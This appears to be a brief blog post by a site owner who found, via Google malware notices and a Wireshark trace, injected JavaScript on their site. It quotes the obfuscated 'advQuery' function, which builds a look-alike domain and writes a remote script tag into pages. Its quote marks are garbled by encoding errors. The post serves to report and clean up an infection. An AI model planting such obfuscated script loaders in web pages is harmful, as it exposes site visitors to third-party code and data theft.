Just today I came across a javascript hack that was sending information for website users to a third party location.
The way I found this out – other than getting malware notices from Google, was to do a wireshark trace on the offending website. From there I saw some interesting requests. Upon closer inspection, I found a piece of code with this function that I did not recognize:
function advQuery(){
var Host=â€http://google.com/â€;Track=â€/if.phpâ€;get=unescape(â€%6E%65%74″);
document.write(unescape(â€%3Cscript src=’â€+Host.substr(0,9)+unescape(â€\u0030\u0030″)+Host.substr(9,5)+get));
document.write(unescape(Track+â€â€˜ type=’text/javascript’%3E%3C/script%3Eâ€));
};advQuery();
It is easy enough to clear up, but now I need to find out how it got there!